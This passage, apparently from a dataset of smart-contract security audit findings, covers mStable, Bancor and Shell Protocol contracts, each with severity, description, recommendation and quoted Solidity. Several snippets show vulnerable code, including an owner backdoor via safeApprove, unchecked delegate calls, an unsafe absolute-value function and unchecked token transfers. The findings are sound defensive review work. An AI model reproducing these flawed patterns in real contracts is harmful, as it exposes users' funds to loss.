For instance, if withdrawing from Aave fails this should not prevent withdrawing from Compound.чч```\\nIPlatformIntegration(\\_integration).checkBalance(\\_bAsset);\\n```\\n -Assumptions are made about bAssets AcknowledgedчlowчThe code makes several assumptions about the bAssets that can be used. A malicious or malfunctioning asset contract might violate those assumptions. This might lead to unintended behavior in the system. Below there are several such assumptions:\\nDecimals of a bAsset are constant where the decimals are used to derive the asset's ratio:\\n```\\nuint256 bAsset\\_decimals = CommonHelpers.getDecimals(\\_bAsset);\\n```\\n\\nDecimals must be in a range from 4 to 18:\\n```\\nrequire(decimals >= 4 && decimals <= 18, \"Token must have sufficient decimal places\");\\n```\\n\\nThe governor is able to foresee when transfer fees are charged (which needs to be called if anything changes); in theory, assets could be much more flexible in when transfer fees are charged (for instance, during certain periods or for certain users)\\n```\\nfunction setTransferFeesFlag(address \\_bAsset, bool \\_flag)\\n```\\n\\nIt seems like some of these assumptions could be avoided, but there might be a cost. For instance, one could retrieve the decimals directly instead of “caching” them and one could always enable the setting where transfer fees may be charged.чConsider revisiting or avoiding these assumptions. 
For any assumptions that are there by design it would be good to document them to facilitate future changes.чч```\\nuint256 bAsset\\_decimals = CommonHelpers.getDecimals(\\_bAsset);\\n```\\n -Unused field in ForgePropsMulti struct Won't FixчlowчThe `ForgePropsMulti` struct defines the field `isValid` which always seems to be true:\\n```\\n/\\*\\* @dev All details needed to Forge with multiple bAssets \\*/\\nstruct ForgePropsMulti {\\n bool isValid; // Flag to signify that forge bAssets have passed validity check\\n Basset[] bAssets;\\n address[] integrators;\\n uint8[] indexes;\\n}\\n```\\n\\nIf it is indeed always true, one could remove the following line:\\n```\\nif(!props.isValid) return 0;\\n```\\nчIf the field is indeed always true please consider removing it to simplify the code.чч```\\n/\\*\\* @dev All details needed to Forge with multiple bAssets \\*/\\nstruct ForgePropsMulti {\\n bool isValid; // Flag to signify that forge bAssets have passed validity check\\n Basset[] bAssets;\\n address[] integrators;\\n uint8[] indexes;\\n}\\n```\\n -BassetStatus enum defines multiple unused states Won't FixчlowчThe `BassetStatus` enum defines several values that do not seem to be assigned in the code:\\nDefault (different from “Normal”?)\\nBlacklisted\\nLiquidating\\nLiquidated\\nFailed\\n```\\n/\\*\\* @dev Status of the Basset - has it broken its peg? \\*/\\nenum BassetStatus {\\n Default,\\n Normal,\\n BrokenBelowPeg,\\n BrokenAbovePeg,\\n Blacklisted,\\n Liquidating,\\n Liquidated,\\n Failed\\n}\\n```\\n\\nSince some of these are used in the code there might be some dead code that can be removed as a result. For example:\\n```\\n\\_bAsset.status == BassetStatus.Liquidating ||\\n\\_bAsset.status == BassetStatus.Blacklisted\\n```\\nчIf those values are indeed never used please consider removing them to simplify the code.чч```\\n/\\*\\* @dev Status of the Basset - has it broken its peg? 
\\*/\\nenum BassetStatus {\\n Default,\\n Normal,\\n BrokenBelowPeg,\\n BrokenAbovePeg,\\n Blacklisted,\\n Liquidating,\\n Liquidated,\\n Failed\\n}\\n```\\n -Potential gas savings by terminating early AcknowledgedчlowчIf a function invocation is bound to revert, one should try to revert as soon as possible to save gas. In `ForgeValidator.validateRedemption` it is possible to terminate more early:\\n```\\nif(atLeastOneBecameOverweight) return (false, \"bAssets must remain below max weight\", false);\\n```\\nчConsider moving the require-statement a few lines up (for instance, after assigning to atLeastOneBecameOverweight).чч```\\nif(atLeastOneBecameOverweight) return (false, \"bAssets must remain below max weight\", false);\\n```\\n -Discrepancy between code and commentsчlowчThere is a discrepancy between the code at:\\n```\\nrequire(weightSum >= 1e18 && weightSum <= 4e18, \"Basket weight must be >= 100 && <= 400%\");\\n```\\n\\nAnd the comment at:\\n```\\n\\* @dev Throws if the total Basket weight does not sum to 100\\n```\\nчUpdate the code or the comment to be consistent.чч```\\nrequire(weightSum >= 1e18 && weightSum <= 4e18, \"Basket weight must be >= 100 && <= 400%\");\\n```\\n -Loss of the liquidity pool is not equally distributedчhighчAll stakeholders in the liquidity pool should be able to withdraw the same amount as they staked plus a share of fees that the converter earned during their staking period.\\n```\\n IPoolTokensContainer(anchor).burn(\\_poolToken, msg.sender, \\_amount);\\n\\n // calculate how much liquidity to remove\\n // if the entire supply is liquidated, the entire staked amount should be sent, otherwise\\n // the price is based on the ratio between the pool token supply and the staked balance\\n uint256 reserveAmount = 0;\\n if (\\_amount == initialPoolSupply)\\n reserveAmount = balance;\\n else\\n reserveAmount = \\_amount.mul(balance).div(initialPoolSupply);\\n\\n // sync the reserve balance / staked balance\\n 
reserves[reserveToken].balance = reserves[reserveToken].balance.sub(reserveAmount);\\n uint256 newStakedBalance = stakedBalances[reserveToken].sub(reserveAmount);\\n stakedBalances[reserveToken] = newStakedBalance;\\n```\\n\\nThe problem is that sometimes there might not be enough funds in reserve (for example, due to this issue https://github.com/ConsenSys/bancor-audit-2020-06/issues/4). So the first ones who withdraw their stakes receive all the tokens they own. But the last stakeholders might not be able to get their funds back because the pool is empty already.\\nSo under some circumstances, there is a chance that users can lose all of their staked funds.\\nThis issue also has the opposite side: if the liquidity pool makes an extra profit, the stakers do not own this profit and cannot withdraw it.чResolution\\nThe issue was addressed by adding a new fee mechanism called ‘adjusted fees'. This mechanism aims to decrease the deficit of the reserves over time. If there is a deficit of reserves, it is usually present on the secondary token side, because there is a strong incentive to bring the primary token to the balanced state. Roughly speaking, the idea is that if the secondary token has a deficit in reserves, there are additional fees for trading that token. These fees are not distributed across the liquidity providers like the regular fees. Instead, they are just populating the reserve, decreasing the existing deficit.\\nLoss is still not distributed across the liquidity providers, and there is a possibility that there are not enough funds for everyone to withdraw them. 
In the case of a run on reserves, LPs will be able to withdraw funds on a first-come-first-serve basis.\\nDistribute losses evenly across the liquidity providers.чч```\\n IPoolTokensContainer(anchor).burn(\\_poolToken, msg.sender, \\_amount);\\n\\n // calculate how much liquidity to remove\\n // if the entire supply is liquidated, the entire staked amount should be sent, otherwise\\n // the price is based on the ratio between the pool token supply and the staked balance\\n uint256 reserveAmount = 0;\\n if (\\_amount == initialPoolSupply)\\n reserveAmount = balance;\\n else\\n reserveAmount = \\_amount.mul(balance).div(initialPoolSupply);\\n\\n // sync the reserve balance / staked balance\\n reserves[reserveToken].balance = reserves[reserveToken].balance.sub(reserveAmount);\\n uint256 newStakedBalance = stakedBalances[reserveToken].sub(reserveAmount);\\n stakedBalances[reserveToken] = newStakedBalance;\\n```\\n -Use of external calls with a fixed amount of gas Won't FixчmediumчThe converter smart contract uses the Solidity transfer() function to transfer Ether.\\n.transfer() and .send() forward exactly 2,300 gas to the recipient. The goal of this hardcoded gas stipend was to prevent reentrancy vulnerabilities, but this only makes sense under the assumption that gas costs are constant. Recently EIP 1884 was included in the Istanbul hard fork. One of the changes included in EIP 1884 is an increase to the gas cost of the SLOAD operation, causing a contract's fallback function to cost more than 2300 gas.\\n```\\n\\_to.transfer(address(this).balance);\\n```\\n\\n```\\nif (\\_targetToken == ETH\\_RESERVE\\_ADDRESS)\\n```\\n\\n```\\nmsg.sender.transfer(reserveAmount);\\n```\\nчResolution\\nIt was decided to accept this minor risk as the usage of .call() might introduce other unexpected behavior.\\nIt's recommended to stop using .transfer() and .send() and instead use .call(). Note that .call() does nothing to mitigate reentrancy attacks, so other precautions must be taken. 
To prevent reentrancy attacks, it is recommended that you use the checks-effects-interactions pattern.чч```\\n\\_to.transfer(address(this).balance);\\n```\\n -Use of assert statement for input validationчlowчSolidity assertion should only be used to assert invariants, i.e. statements that are expected to always hold if the code behaves correctly. Note that all available gas is consumed when an assert-style exception occurs.\\nIt appears that assert() is used in one location within the test scope to catch invalid user inputs:\\n```\\nassert(amount < targetReserveBalance);\\n```\\nчUsing `require()` instead of `assert()`.чч```\\nassert(amount < targetReserveBalance);\\n```\\n -Certain functions lack input validation routinesчhighчThe functions should first check if the passed arguments are valid first. The checks-effects-interactions pattern should be implemented throughout the code.\\nThese checks should include, but not be limited to:\\n`uint` should be larger than `0` when `0` is considered invalid\\n`uint` should be within constraints\\n`int` should be positive in some cases\\nlength of arrays should match if more arrays are sent as arguments\\naddresses should not be `0x0`\\nThe function `includeAsset` does not do any checks before changing the contract state.\\n```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n\\nThe internal function called by the public method `includeAsset` again doesn't check any of the data.\\n```\\nfunction includeAsset (Shells.Shell storage shell, address \\_numeraire, address \\_numeraireAssim, address \\_reserve, address \\_reserveAssim, uint256 \\_weight) internal {\\n\\n Assimilators.Assimilator storage \\_numeraireAssimilator = shell.assimilators[\\_numeraire];\\n\\n \\_numeraireAssimilator.addr = \\_numeraireAssim;\\n\\n 
\\_numeraireAssimilator.ix = uint8(shell.numeraires.length);\\n\\n shell.numeraires.push(\\_numeraireAssimilator);\\n\\n Assimilators.Assimilator storage \\_reserveAssimilator = shell.assimilators[\\_reserve];\\n\\n \\_reserveAssimilator.addr = \\_reserveAssim;\\n\\n \\_reserveAssimilator.ix = uint8(shell.reserves.length);\\n\\n shell.reserves.push(\\_reserveAssimilator);\\n\\n shell.weights.push(\\_weight.divu(1e18).add(uint256(1).divu(1e18)));\\n\\n}\\n```\\n\\nSimilar with `includeAssimilator`.\\n```\\nfunction includeAssimilator (address \\_numeraire, address \\_derivative, address \\_assimilator) public onlyOwner {\\n shell.includeAssimilator(\\_numeraire, \\_derivative, \\_assimilator);\\n}\\n```\\n\\nAgain no checks are done in any function.\\n```\\nfunction includeAssimilator (Shells.Shell storage shell, address \\_numeraire, address \\_derivative, address \\_assimilator) internal {\\n\\n Assimilators.Assimilator storage \\_numeraireAssim = shell.assimilators[\\_numeraire];\\n\\n shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix);\\n // shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix, 0, 0);\\n\\n}\\n```\\n\\nNot only does the administrator functions not have any checks, but also user facing functions do not check the arguments.\\nFor example `swapByOrigin` does not check any of the arguments if you consider it calls `MainnetDaiToDaiAssimilator`.\\n```\\nfunction swapByOrigin (address \\_o, address \\_t, uint256 \\_oAmt, uint256 \\_mTAmt, uint256 \\_dline) public notFrozen returns (uint256 tAmt\\_) {\\n\\n return transferByOrigin(\\_o, \\_t, \\_dline, \\_mTAmt, \\_oAmt, msg.sender);\\n\\n}\\n```\\n\\nIt calls `transferByOrigin` and we simplify this example and consider we have `_o.ix == _t.ix`\\n```\\nfunction transferByOrigin (address \\_origin, address \\_target, uint256 \\_dline, uint256 \\_mTAmt, uint256 \\_oAmt, address \\_rcpnt) public notFrozen 
nonReentrant returns (uint256 tAmt\\_) {\\n\\n Assimilators.Assimilator memory \\_o = shell.assimilators[\\_origin];\\n Assimilators.Assimilator memory \\_t = shell.assimilators[\\_target];\\n\\n // TODO: how to include min target amount\\n if (\\_o.ix == \\_t.ix) return \\_t.addr.outputNumeraire(\\_rcpnt, \\_o.addr.intakeRaw(\\_oAmt));\\n```\\n\\nIn which case it can call 2 functions on an assimilatior such as `MainnetDaiToDaiAssimilator`.\\nThe first called function is `intakeRaw`.\\n```\\n// transfers raw amonut of dai in, wraps it in cDai, returns numeraire amount\\nfunction intakeRaw (uint256 \\_amount) public returns (int128 amount\\_, int128 balance\\_) {\\n\\n dai.transferFrom(msg.sender, address(this), \\_amount);\\n\\n amount\\_ = \\_amount.divu(1e18);\\n\\n}\\n```\\n\\nAnd its result is used in `outputNumeraire` that again does not have any checks.\\n```\\n// takes numeraire amount of dai, unwraps corresponding amount of cDai, transfers that out, returns numeraire amount\\nfunction outputNumeraire (address \\_dst, int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n amount\\_ = \\_amount.mulu(1e18);\\n\\n dai.transfer(\\_dst, amount\\_);\\n\\n return amount\\_;\\n\\n}\\n```\\nчResolution\\nComment from the development team:\\nNow all functions in the Orchestrator revert on incorrect arguments.\\nAll functions in Loihi in general revert on incorrect arguments.\\nImplement the `checks-effects-interactions` as a pattern to write code. 
Add tests that check if all of the arguments have been validated.\\nConsider checking arguments as an important part of writing code and developing the system.чч```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n -Remove Loihi methods that can be used as backdoors by the administratorчhighчThere are several functions in `Loihi` that give extreme powers to the shell administrator. The most dangerous set of those is the ones granting the capability to add assimilators.\\nSince assimilators are essentially a proxy architecture to delegate code to several different implementations of the same interface, the administrator could, intentionally or unintentionally, deploy malicious or faulty code in the implementation of an assimilator. This means that the administrator is essentially totally trusted to not run code that, for example, drains the whole pool or locks up the users' and LPs' tokens.\\nIn addition to these, the function `safeApprove` allows the administrator to move any of the tokens the contract holds to any address regardless of the balances any of the users have.\\nThis can also be used by the owner as a backdoor to completely drain the contract.\\n```\\nfunction safeApprove(address \\_token, address \\_spender, uint256 \\_value) public onlyOwner {\\n\\n (bool success, bytes memory returndata) = \\_token.call(abi.encodeWithSignature(\"approve(address,uint256)\", \\_spender, \\_value));\\n\\n require(success, \"SafeERC20: low-level call failed\");\\n\\n}\\n```\\nчRemove the `safeApprove` function and, instead, use a trustless escape-hatch mechanism like the one suggested in issue 6.1.\\nFor the assimilator addition functions, our recommendation is that they are made completely internal, only callable in the constructor, at deploy time.\\nEven though this is not a big 
structural change (in fact, it reduces the attack surface), it is, indeed, a feature loss. However, this is the only way to make each shell a time-invariant system.\\nThis would not only increase Shell's security but also would greatly improve the trust the users have in the protocol since, after deployment, the code is now static and auditable.чч```\\nfunction safeApprove(address \\_token, address \\_spender, uint256 \\_value) public onlyOwner {\\n\\n (bool success, bytes memory returndata) = \\_token.call(abi.encodeWithSignature(\"approve(address,uint256)\", \\_spender, \\_value));\\n\\n require(success, \"SafeERC20: low-level call failed\");\\n\\n}\\n```\\n -Assimilators should implement an interfaceчhighчThe Assimilators are one of the core components within the application. They are used to move the tokens and can be thought of as a “middleware” between the Shell Protocol application and any other supported tokens.\\nThe methods attached to the assimilators are called throughout the application and they are a critical component of the whole system. Because of this fact, it is extremely important that they behave correctly.\\nA suggestion to restrict the possibility of errors when implementing them and when using them is to make all of the assimilators implement a unique specific interface. This way, any deviation would be immediately observed, right when the compilation happens.\\nConsider this example. The user calls `swapByOrigin`.\\n```\\nfunction swapByOrigin (address \\_o, address \\_t, uint256 \\_oAmt, uint256 \\_mTAmt, uint256 \\_dline) public notFrozen returns (uint256 tAmt\\_) {\\n\\n return transferByOrigin(\\_o, \\_t, \\_dline, \\_mTAmt, \\_oAmt, msg.sender);\\n\\n}\\n```\\n\\nWhich calls `transferByOrigin`. 
In `transferByOrigin`, if the origin index matches the target index, a different execution branch is activated.\\n```\\nif (\\_o.ix == \\_t.ix) return \\_t.addr.outputNumeraire(\\_rcpnt, \\_o.addr.intakeRaw(\\_oAmt));\\n```\\n\\nIn this case we need the output of `_o.addr.intakeRaw(_oAmt)`.\\nIf we pick a random assimilator and check the implementation, we see the function `intakeRaw` needs to return the transferred amount.\\n```\\n// takes raw cdai amount, transfers it in, calculates corresponding numeraire amount and returns it\\nfunction intakeRaw (uint256 \\_amount) public returns (int128 amount\\_) {\\n\\n bool success = cdai.transferFrom(msg.sender, address(this), \\_amount);\\n\\n if (!success) revert(\"CDai/transferFrom-failed\");\\n\\n uint256 \\_rate = cdai.exchangeRateStored();\\n\\n \\_amount = ( \\_amount \\* \\_rate ) / 1e18;\\n\\n cdai.redeemUnderlying(\\_amount);\\n\\n amount\\_ = \\_amount.divu(1e18);\\n\\n}\\n```\\n\\nHowever, with other implementations, the returns do not match. 
In the case of `MainnetDaiToDaiAssimilator`, it returns 2 values, which will make the `Loihi` contract work in this case but can misbehave in other cases, or even fail.\\n```\\n// transfers raw amonut of dai in, wraps it in cDai, returns numeraire amount\\nfunction intakeRaw (uint256 \\_amount) public returns (int128 amount\\_, int128 balance\\_) {\\n\\n dai.transferFrom(msg.sender, address(this), \\_amount);\\n\\n amount\\_ = \\_amount.divu(1e18);\\n\\n}\\n```\\n\\nMaking all the assimilators implement one unique interface will enforce the functions to look the same from the outside.чCreate a unique interface for the assimilators and make all the contracts implement that interface.чч```\\nfunction swapByOrigin (address \\_o, address \\_t, uint256 \\_oAmt, uint256 \\_mTAmt, uint256 \\_dline) public notFrozen returns (uint256 tAmt\\_) {\\n\\n return transferByOrigin(\\_o, \\_t, \\_dline, \\_mTAmt, \\_oAmt, msg.sender);\\n\\n}\\n```\\n -Assimilators do not conform to the ERC20 specificationчmediumчThe assimilators in the codebase make heavy usage of both the `transfer` and `transferFrom` methods in the ERC20 standard.\\nQuoting the relevant parts of the specification of the standard:\\nTransfers _value amount of tokens to address _to, and MUST fire the Transfer event. The function SHOULD throw if the message caller's account balance does not have enough tokens to spend.\\nThe transferFrom method is used for a withdraw workflow, allowing contracts to transfer tokens on your behalf. This can be used for example to allow a contract to transfer tokens on your behalf and/or to charge fees in sub-currencies. 
The function SHOULD throw unless the _from account has deliberately authorized the sender of the message via some mechanism.\\nWe can see that, even though it is suggested that ERC20-compliant tokens do `throw` on the lack of authorization from the sender or lack of funds to complete the transfer, the standard does not enforce it.\\nThis means that, in order to make the system both more resilient and future-proof, code in each implementation of current and future assimilators should check for the return value of both `transfer` and `transferFrom` call instead of just relying on the external contract to revert execution.\\nThe extent of this issue is only mitigated by the fact that new assets are only added by the shell administrator and could, therefore, be audited prior to their addition.\\nNon-exhaustive Examples\\n```\\ndai.transferFrom(msg.sender, address(this), \\_amount);\\n```\\n\\n```\\ndai.transfer(\\_dst, \\_amount);\\n```\\nчAdd a check for the return boolean of the function.\\nExample:\\n`require(dai.transferFrom(msg.sender, address(this), _amount) == true);`чч```\\ndai.transferFrom(msg.sender, address(this), \\_amount);\\n```\\n -Access to assimilators does not check for existence and allows delegation to the zeroth addressчmediumчFor every method that allows to selectively withdraw, deposit, or swap tokens in `Loihi`, the user is allowed to specify addresses for the assimilators of said tokens (by inputting the addresses of the tokens themselves).\\nThe shell then performs a lookup on a mapping called `assimilators` inside its main structure and uses the result of that lookup to delegate call the assimilator deployed by the shell administrator.\\nHowever, there are no checks for prior instantiation of a specific, supported token, effectively meaning that we can do a lookup on an all-zeroed-out member of that mapping and delegate call execution to the zeroth address.\\nFor example, the 32 bytes expected as a result of this call:\\n```\\nfunction 
viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n\\nThis is definitely an insufficient check since the interface for the assimilators might change in the future to include functions that have no return values.чCheck for the prior instantiation of assimilators by including the following requirement:\\n`require(shell.assimilators[].ix != 0);`\\nIn all the functions that access the `assimilators` mapping and change the indexes to be 1-based instead of 0-based.чч```\\nfunction viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n -Math library's fork has problematic changesчmediumчThe math library ABDK Libraries for Solidity was forked and modified to add a few `unsafe_*` functions.\\n`unsafe_add`\\n`unsafe_sub`\\n`unsafe_mul`\\n`unsafe_div`\\n`unsafe_abs`\\nThe problem which was introduced is that `unsafe_add` ironically is not really unsafe, it is as safe as the original `add` function. It is, in fact, identical to the safe `add` function.\\n```\\n/\\*\\*\\n \\* Calculate x + y. 
Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @param y signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction add (int128 x, int128 y) internal pure returns (int128) {\\n int256 result = int256(x) + y;\\n require (result >= MIN\\_64x64 && result <= MAX\\_64x64);\\n return int128 (result);\\n}\\n```\\n\\n```\\n/\\*\\*\\n \\* Calculate x + y. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @param y signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction unsafe\\_add (int128 x, int128 y) internal pure returns (int128) {\\n int256 result = int256(x) + y;\\n require (result >= MIN\\_64x64 && result <= MAX\\_64x64);\\n return int128 (result);\\n}\\n```\\n\\nFortunately, `unsafe_add` is not used anywhere in the code.\\nHowever, `unsafe_abs` was changed from this:\\n```\\n/\\*\\*\\n \\* Calculate |x|. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction abs (int128 x) internal pure returns (int128) {\\n require (x != MIN\\_64x64);\\n return x < 0 ? -x : x;\\n}\\n```\\n\\nTo this:\\n```\\n/\\*\\*\\n \\* Calculate |x|. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction unsafe\\_abs (int128 x) internal pure returns (int128) {\\n return x < 0 ? 
-x : x;\\n}\\n```\\n\\nThe check that was removed, is actually an important check:\\n```\\nrequire (x != MIN\\_64x64);\\n```\\n\\n```\\nint128 private constant MIN\\_64x64 = -0x80000000000000000000000000000000;\\n```\\n\\nThe problem is that for an `int128` variable that is equal to `-0x80000000000000000000000000000000`, there is no absolute value within the constraints of `int128`.\\nStarting from int128 `n` = `-0x80000000000000000000000000000000`, the absolute value should be int128 `abs_n` = -n, however `abs_n` is equal to the initial value of `n`. The final value of `abs_n` is still `-0x80000000000000000000000000000000`. It's still not a positive or zero value. The operation `0 - n` wraps back to the same initial value.чRemove unused `unsafe_*` functions and try to find other ways of doing unsafe math (if it is fundamentally important) without changing existing, trusted, already audited code.чч```\\n/\\*\\*\\n \\* Calculate x + y. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @param y signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction add (int128 x, int128 y) internal pure returns (int128) {\\n int256 result = int256(x) + y;\\n require (result >= MIN\\_64x64 && result <= MAX\\_64x64);\\n return int128 (result);\\n}\\n```\\n -Use one file for each contract or libraryчmediumчThe repository contains a lot of contracts and libraries that are added in the same file as another contract or library.\\nOrganizing the code in this manner makes it hard to navigate, develop and audit. It is a best practice to have each contract or library in its own file. 
The file also needs to bear the name of the hosted contract or library.\\n```\\nlibrary SafeERC20Arithmetic {\\n```\\n\\n```\\nlibrary Shells {\\n```\\n\\n```\\ncontract ERC20Approve {\\n function approve (address spender, uint256 amount) public returns (bool);\\n}\\n```\\n\\n```\\ncontract Loihi is LoihiRoot {\\n```\\n\\n```\\nlibrary Delegate {\\n```\\n\\n```\\nlibrary Assimilators {\\n```\\nчSplit up contracts and libraries in single files.чч```\\nlibrary SafeERC20Arithmetic {\\n```\\n -Remove debugging code from the repositoryчmediumчThroughout the repository, there is source code from the development stage that was used for debugging the functionality and was not removed.\\nThis should not be present in the source code and even if they are used while functionality is developed, they should be removed after the functionality was implemented.\\n```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int256);\\nevent log\\_ints(bytes32, int256[]);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_uints(bytes32, uint256[]);\\n```\\n\\n```\\nevent log(bytes32);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_int(bytes32, int256);\\n```\\n\\n```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int128);\\nevent log\\_int(bytes32, int);\\nevent log\\_uint(bytes32, uint);\\nevent log\\_addr(bytes32, address);\\n```\\n\\n```\\nevent log(bytes32);\\n```\\n\\n```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int256);\\nevent log\\_ints(bytes32, int256[]);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_uints(bytes32, uint256[]);\\n```\\n\\n```\\nevent log\\_int(bytes32, int);\\nevent log\\_ints(bytes32, int128[]);\\nevent log\\_uint(bytes32, uint);\\nevent log\\_uints(bytes32, uint[]);\\nevent log\\_addrs(bytes32, address[]);\\n```\\n\\n```\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_int(bytes32, int256);\\n```\\n\\n```\\nevent log\\_uint(bytes32, uint256);\\n```\\n\\n```\\nshell.testHalts = true;\\n```\\n\\n```\\nfunction setTestHalts (bool 
\\_testOrNotToTest) public {\\n\\n shell.testHalts = \\_testOrNotToTest;\\n\\n}\\n```\\n\\n```\\nbool testHalts;\\n```\\nчRemove the debug functionality at the end of the development cycle of each functionality.чч```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int256);\\nevent log\\_ints(bytes32, int256[]);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_uints(bytes32, uint256[]);\\n```\\n -Remove commented out code from the repositoryчmediumчHaving commented out code increases the cognitive load on an already complex system. Also, it hides the important parts of the system that should get the proper attention, but that attention gets to be diluted.\\nThere is no code that is important enough to be left commented out in a repository. Git branching should take care of having different code versions or diffs should show what was before.\\nIf there is commented out code, this also has to be maintained; it will be out of date if other parts of the system are changed, and the tests will not pick that up.\\nThe main problem is that commented code adds confusion with no real benefit. 
Code should be code, and comments should be comments.\\nCommented out code should be removed or dealt with in a separate branch that is later included in the master branch.\\n```\\nfunction viewRawAmount (address \\_assim, int128 \\_amt) internal returns (uint256 amount\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewRawAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewRawAmount.selector, \\_amt.abs()); // for development\\n\\n amount\\_ = abi.decode(\\_assim.delegate(data), (uint256)); // for development\\n\\n}\\n```\\n\\n```\\nfunction viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n\\n```\\nfunction viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n\\n```\\nfunction includeAssimilator (Shells.Shell storage shell, address \\_numeraire, address \\_derivative, address \\_assimilator) internal {\\n\\n Assimilators.Assimilator storage \\_numeraireAssim = shell.assimilators[\\_numeraire];\\n\\n shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix);\\n // shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix, 0, 0);\\n\\n}\\n```\\n\\n```\\nfunction transfer (address \\_recipient, uint256 \\_amount) public nonReentrant returns (bool) {\\n // return 
shell.transfer(\\_recipient, \\_amount);\\n}\\n\\nfunction transferFrom (address \\_sender, address \\_recipient, uint256 \\_amount) public nonReentrant returns (bool) {\\n // return shell.transferFrom(\\_sender, \\_recipient, \\_amount);\\n}\\n\\nfunction approve (address \\_spender, uint256 \\_amount) public nonReentrant returns (bool success\\_) {\\n // return shell.approve(\\_spender, \\_amount);\\n}\\n\\nfunction increaseAllowance(address \\_spender, uint256 \\_addedValue) public returns (bool success\\_) {\\n // return shell.increaseAllowance(\\_spender, \\_addedValue);\\n}\\n\\nfunction decreaseAllowance(address \\_spender, uint256 \\_subtractedValue) public returns (bool success\\_) {\\n // return shell.decreaseAllowance(\\_spender, \\_subtractedValue);\\n}\\n\\nfunction balanceOf (address \\_account) public view returns (uint256) {\\n // return shell.balances[\\_account];\\n}\\n```\\n\\n```\\n// function test\\_s1\\_selectiveDeposit\\_noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_NO\\_HACK () public logs\\_gas {\\n\\n// uint256 newShells = super.noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD();\\n\\n// assertEq(newShells, 32499999216641686631);\\n\\n// }\\n\\n// function test\\_s1\\_selectiveDeposit\\_noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_HACK () public logs\\_gas {\\n\\n// uint256 newShells = super.noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_HACK();\\n\\n// assertEq(newShells, 32499999216641686631);\\n\\n// }\\n```\\n\\n```\\n// function noSlippage\\_balanced\\_10DAI\\_10USDC\\_10USDT\\_2p5SUSD\\_HACK () public returns (uint256 shellsMinted\\_) {\\n\\n// uint256 startingShells = l.proportionalDeposit(300e18);\\n\\n// uint256 gas = gasleft();\\n\\n// shellsMinted\\_ = l.depositHack(\\n// address(dai), 10e18,\\n// address(usdc), 10e6,\\n// address(usdt), 10e6,\\n// address(susd), 2.5e18\\n// );\\n\\n// emit log\\_uint(\"gas for deposit\", gas - gasleft());\\n\\n\\n// }\\n```\\nчRemove all the 
